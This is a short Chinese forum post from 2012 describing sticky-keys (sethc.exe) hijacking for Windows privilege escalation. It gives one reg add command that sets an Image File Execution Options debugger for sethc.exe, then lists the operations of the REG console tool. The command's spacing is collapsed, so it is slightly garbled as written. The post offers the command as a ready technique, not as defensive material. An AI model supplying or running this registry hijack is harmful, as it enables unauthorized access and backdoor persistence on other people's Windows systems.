传奇GM论坛»论坛 › 精品版本 › 微端版本 › 命令行下操作注册表劫持sethc提权

命令行下操作注册表劫持sethc提权

289 |

0 | 2012-4-1 19:23:43 | 显示全部楼层 |阅读模式

经典的利用劫持替换sethc.exe的例子：

regadd"HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ImageFileExecutionOptions\sethc.exe"/vdebugger/dtaskmgr.exe/f
-----------------------------------------------------------------------------------------------------------------------------------------------
Windows控制台注册表工具-版本3.0
格式就是：REGOperation参数列表

返回代码:0-成功1-失败(除了REGCOMPARE)
Operation有11个，可以这样得到帮助：REGOperation/?

REGQUERY

REGADD

REGDELETE

REGCOPY

REGSAVE

REGRESTORE

REGLOAD

REGUNLOAD

REGCOMPARE

REGEXPORT

REGIMPORT
 
*
*

发帖前要善用【论坛搜索】功能，那里可能会有你要找的答案或者已经有人发布过相同内容了，请勿重复发帖。

使用道具举报